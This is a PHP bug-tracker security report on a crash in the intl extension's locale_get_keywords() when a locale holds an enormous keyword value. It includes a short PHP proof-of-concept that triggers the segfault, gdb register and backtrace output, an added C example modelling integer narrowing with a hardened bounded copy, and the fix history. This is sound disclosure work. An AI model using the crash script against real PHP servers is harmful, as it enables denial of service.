Sec Bug #73376 crash in locale_get_keywords() when keyword value in locale string too long
Submitted: 2016-10-23 09:09 UTC Modified: 2016-11-14 11:45 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: intl (PECL)
PHP Version: 7.0.13 OS:
Private report: No CVE-ID: None
 [2016-10-23 09:09 UTC] nguyenluan dot vnn at gmail dot com
Description:
------------
Function locale_get_keywords():

PHP_FUNCTION( locale_get_keywords )
{
    UEnumeration*   e        = NULL;
    UErrorCode      status   = U_ZERO_ERROR;

    ...
    ...

    while( ( kw_key = uenum_next( e, &kw_key_len, &status ) ) != NULL ){
        kw_value_len = 100;
        kw_value_str = zend_string_alloc(kw_value_len, 0);

        /* Get the keyword value for each keyword */
        kw_value_len=uloc_getKeywordValue( loc_name, kw_key, ZSTR_VAL(kw_value_str), kw_value_len, &status );  // (1) crash in this call
        if (status == U_BUFFER_OVERFLOW_ERROR) {

    ...
    ...
}

When a large keyword value is passed in the locale string, this function causes PHP 7 to crash.

Test script:
---------------
<?php
    // Lift the memory limit so the ~4 GiB string below can be allocated.
    ini_set('memory_limit', -1);

    // 4 * 0x3fffffff = 0xfffffffc bytes of "test", used as the value of the
    // "collation" keyword in the locale string.
    $str = str_repeat('test', 0x3fffffff);
    $keywords_arr = locale_get_keywords("de_DE@currency=EUR;collation=$str");
?>

Expected result:
----------------
No crash.

Actual result:
--------------
gdb-peda$ r ../test/string/test.php 
Starting program: /home/user/Desktop/php-7.0.12/sapi/cli/php ../test/string/test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

 [----------------------------------registers-----------------------------------]
RAX: 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
RBX: 0xfffffffc 
RCX: 0x73657474 ('ttes')
RDX: 0x0 
RSI: 0x9 ('\t')
RDI: 0x7fffebdfffe0 --> 0x0 
RBP: 0x7fffffffa5e0 ("collation")
RSP: 0x7fffffffa588 --> 0x7ffff4350c65 (<uloc_getKeywordValue_55+741>:	)
RIP: 0x7ffff3939435 (<__strncpy_sse2_unaligned+3685>:	)
R8 : 0xffffffffffe73094 
R9 : 0x0 
R10: 0x1c 
R11: 0x7ffff3a1a650 --> 0xfff1e980fff1e970 
R12: 0x7ffdeb400035 ("testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest"...)
R13: 0x9 ('\t')
R14: 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
R15: 0x7ffdeb40002b ("collation=testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttestte"...)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff393942a <__strncpy_sse2_unaligned+3674>:	
    jb     0x7ffff3939449 <__strncpy_sse2_unaligned+3705>
   0x7ffff393942c <__strncpy_sse2_unaligned+3676>:	
    movdqa XMMWORD PTR [rdi],xmm0
   0x7ffff3939430 <__strncpy_sse2_unaligned+3680>:	
    movdqa XMMWORD PTR [rdi+0x10],xmm0
=> 0x7ffff3939435 <__strncpy_sse2_unaligned+3685>:	
    movdqa XMMWORD PTR [rdi+0x20],xmm0
   0x7ffff393943a <__strncpy_sse2_unaligned+3690>:	
    movdqa XMMWORD PTR [rdi+0x30],xmm0
   0x7ffff393943f <__strncpy_sse2_unaligned+3695>:	add    rdi,0x40
   0x7ffff3939443 <__strncpy_sse2_unaligned+3699>:	sub    r8,0x40
   0x7ffff3939447 <__strncpy_sse2_unaligned+3703>:	
    jae    0x7ffff393942c <__strncpy_sse2_unaligned+3676>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa588 --> 0x7ffff4350c65 (<uloc_getKeywordValue_55+741>:	)
0008| 0x7fffffffa590 --> 0x0 
0016| 0x7fffffffa598 --> 0x7ffdeb400034 ("=testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttes"...)
0024| 0x7fffffffa5a0 --> 0x7fffffffa704 --> 0x900000000 ('')
0032| 0x7fffffffa5a8 --> 0x7fffffffa5c0 ("collation")
0040| 0x7fffffffa5b0 --> 0x6400000000 ('')
0048| 0x7fffffffa5b8 --> 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
0056| 0x7fffffffa5c0 ("collation")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__strncpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:1671
1671	../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.

gdb-peda$ bt
#0  __strncpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:1671
#1  0x00007ffff4350c65 in uloc_getKeywordValue_55 ()
   from /usr/lib/x86_64-linux-gnu/libicuuc.so.55
#2  0x00000000006eea58 in zif_locale_get_keywords (
    execute_data=0x7fffebc141b0, return_value=0x7fffebc14120)
    at /home/user/Desktop/php-7.0.12/ext/intl/locale/locale_methods.c:732
#3  0x0000000000ad8506 in ZEND_DO_ICALL_SPEC_HANDLER ()
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:586
#4  0x0000000000ad7f32 in execute_ex (ex=0x7fffebc14030)
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:414
#5  0x0000000000ad8043 in zend_execute (op_array=0x7fffebc81000, 
    return_value=0x0)
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:458
#6  0x0000000000a78cfc in zend_execute_scripts (type=0x8, retval=0x0, 
    file_count=0x3) at /home/user/Desktop/php-7.0.12/Zend/zend.c:1427
#7  0x00000000009e11d5 in php_execute_script (primary_file=0x7fffffffce20)
    at /home/user/Desktop/php-7.0.12/main/main.c:2494
#8  0x0000000000b412f8 in do_cli (argc=0x2, argv=0x14a6630)
    at /home/user/Desktop/php-7.0.12/sapi/cli/php_cli.c:974
#9  0x0000000000b424c6 in main (argc=0x2, argv=0x14a6630)
    at /home/user/Desktop/php-7.0.12/sapi/cli/php_cli.c:1344
#10 0x00007ffff38b3830 in __libc_start_main (main=0xb41cbb <main>, argc=0x2, 
    argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe198)
    at ../csu/libc-start.c:291
#11 0x00000000004475a9 in _start ()
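
The register dump above shows the crash inside strncpy() called from uloc_getKeywordValue(): RBX holds 0xfffffffc, which is the value length 4 * 0x3fffffff narrowed to a 32-bit int (-4), RDI points at the end of a mapped region, and R8 still holds a remaining byte count far larger than the 100-byte buffer the PHP snippet allocates. Reading this as "a huge length was narrowed to int32_t, went negative, passed a signed fits-in-buffer check, and strncpy() was then told to copy (size_t)-4 bytes" is an inference from the dump, not something the report itself states. The C program below is an added example written for this page, not code from PHP or ICU: it models the fits-in-buffer decision made on the narrowed length next to the same decision made on the untruncated length, and shows a hardened extractor that parses the `@key=value;` part of a locale id itself and bounds the copy in the size_t domain. The parser, the SAMPLE_LOCALE string and the helper names are constructed for the example.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Length of the value built by the test script: str_repeat('test', 0x3fffffff). */
#define POC_VALUE_LEN (4ULL * 0x3fffffffULL)        /* 0xfffffffc bytes */

/* Capacity PHP hands to uloc_getKeywordValue() in the snippet in the report. */
#define PHP_KW_BUFFER_CAP 100

/* Constructed sample locale id for the parser below (not from the report). */
#define SAMPLE_LOCALE "de_DE@currency=EUR;collation=phonebook"

/* A byte count after it has been narrowed to int32_t (explicit wrap, no UB). */
static int32_t as_int32_len(uint64_t n)
{
    return (int32_t)(uint32_t)n;
}

/* Model of a "does the value fit?" check performed on the narrowed length.
 * Returns 1 if such code would go on to copy, 0 if it would report overflow.
 * For POC_VALUE_LEN the narrowed length is -4, so the check passes even though
 * the value is almost 4 GiB, and a copy with count (size_t)-4 would follow. */
static int fits_after_narrowing(uint64_t value_len, int32_t capacity)
{
    int32_t key_value_len = as_int32_len(value_len);
    return key_value_len <= capacity;
}

/* The same decision made before any narrowing, in the unsigned domain. */
static int fits_unnarrowed(uint64_t value_len, uint64_t capacity)
{
    return value_len <= capacity;               /* 0xfffffffc <= 100 is false */
}

/* Locate "key=value" inside the '@'-delimited, ';'-separated keyword part of a
 * locale id. Returns 0 with *value/*value_len pointing into `locale`, or -1
 * if there is no keyword section or the key is absent. */
static int find_keyword_value(const char *locale, const char *key,
                              const char **value, size_t *value_len)
{
    const char *p = strchr(locale, '@');
    size_t klen = strlen(key);
    if (p == NULL) return -1;
    for (p = p + 1; *p != '\0'; ) {
        const char *seg_end = strchr(p, ';');
        size_t seg_len = seg_end ? (size_t)(seg_end - p) : strlen(p);
        const char *eq = memchr(p, '=', seg_len);
        if (eq != NULL && (size_t)(eq - p) == klen && memcmp(p, key, klen) == 0) {
            *value = eq + 1;
            *value_len = seg_len - klen - 1;
            return 0;
        }
        if (seg_end == NULL) break;
        p = seg_end + 1;
    }
    return -1;
}

/* Hardened extractor: the bound is checked on the untruncated size_t length and
 * nothing is written unless value plus terminator fits. Returns the value length,
 * -1 if the key is absent, -2 if the value does not fit the caller's buffer. */
static int get_keyword_value_checked(const char *locale, const char *key,
                                     char *out, size_t out_cap)
{
    const char *v;
    size_t vlen;
    if (find_keyword_value(locale, key, &v, &vlen) != 0) return -1;
    if (vlen > (size_t)INT_MAX || vlen + 1 > out_cap) return -2;
    memcpy(out, v, vlen);
    out[vlen] = '\0';
    return (int)vlen;
}

/* Extract `key` into a buffer of `cap` bytes and compare with `expected`. */
static int extracts_to(const char *locale, const char *key, size_t cap,
                       const char *expected)
{
    char buf[PHP_KW_BUFFER_CAP] = {0};
    if (cap > sizeof buf) cap = sizeof buf;
    if (get_keyword_value_checked(locale, key, buf, cap) < 0) return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    char buf[PHP_KW_BUFFER_CAP];
    printf("PoC value length narrowed to int32_t: %d\n", as_int32_len(POC_VALUE_LEN));
    printf("narrowed check says fits: %d, unnarrowed check says fits: %d\n",
           fits_after_narrowing(POC_VALUE_LEN, PHP_KW_BUFFER_CAP),
           fits_unnarrowed(POC_VALUE_LEN, PHP_KW_BUFFER_CAP));
    printf("collation -> %d bytes: %s\n",
           get_keyword_value_checked(SAMPLE_LOCALE, "collation", buf, sizeof buf), buf);
    return 0;
}
```

The point of the two `fits_*` functions is that the same input and the same 100-byte capacity give opposite answers depending on whether the comparison happens before or after the length is squeezed into int32_t; any caller that forwards attacker-controlled strings to an API with int32_t length parameters should reject lengths it cannot represent (or, more simply, cap the whole locale string at a small policy limit) before the call.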


History

 [2016-11-04 03:09 UTC] stas@php.net
-PHP Version: 7.0.12 +PHP Version: 5.6.27
 [2016-11-04 06:01 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 06:01 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-11-11 12:36 UTC] nguyenluan dot vnn at gmail dot com
-Status: Closed +Status: Assigned
 [2016-11-11 12:36 UTC] nguyenluan dot vnn at gmail dot com
I checked with PHP version 7.0.13; it still crashes. Please check again.
 [2016-11-11 12:37 UTC] nguyenluan dot vnn at gmail dot com
-Status: Assigned +Status: Open -PHP Version: 5.6.27 +PHP Version: 7.0.13
 [2016-11-11 12:37 UTC] nguyenluan dot vnn at gmail dot com
Open this issue again.
 [2016-11-14 11:45 UTC] nguyenluan dot vnn at gmail dot com
-Status: Open +Status: Closed
 [2016-11-14 11:45 UTC] nguyenluan dot vnn at gmail dot com
Fixed in PHP 7.1.0 RC6. Please close.

Thanks.
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Wed Oct 21 17:01:23 2020 UTC